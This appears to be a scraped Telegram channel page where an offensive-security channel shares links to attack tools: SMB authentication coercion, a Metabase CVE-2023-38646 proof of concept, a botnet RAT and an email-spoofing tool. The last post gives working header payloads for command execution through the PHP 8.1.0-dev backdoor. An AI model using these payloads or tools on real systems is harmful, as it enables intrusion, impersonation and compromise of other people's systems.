Pentester
2.81K subscribers
117 photos
3 videos
163 files
2.76K links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analisys
- Web Security
Download Telegram
It's a tool to interact with remote hosts using the Windows Search Protocol and coerce authentication. The target host will connect over SMB to the listener host using the machine account.

https://github.com/slemire/WSPCoerce
Proof of Concept for CVE-2023-38646

This vulnerability has been declared as critical, because it allows an unauthenticated attacker to execute arbitrary commands with the same privileges as the Metabase server. This vulnerability means the Metabase server can become a potential entry point for malicious attacks, which could compromise the integrity of the whole system it operates on.

https://github.com/Zenmovie/CVE-2023-38646
TBBRAT - this is power full BotNet

https://github.com/StayBeautiful-collab/TBBRAT
🔥1
This allows you to spoof emails from any of the +2 Million domains using MailChannels. It also gives you a slightly higher chance of landing a spoofed emails from any domain that doesn't have an SPF & DMARC due to ARC adoption.

https://github.com/byt3bl33d3r/SpamChannel
#PHP 8.1.0-dev then try #RCE & SQLi
Try : User-Agentt: zerodiumsleep(5);
Try : User-Agentt: zerodiumsystem('id');
3👍3🤣3🔥1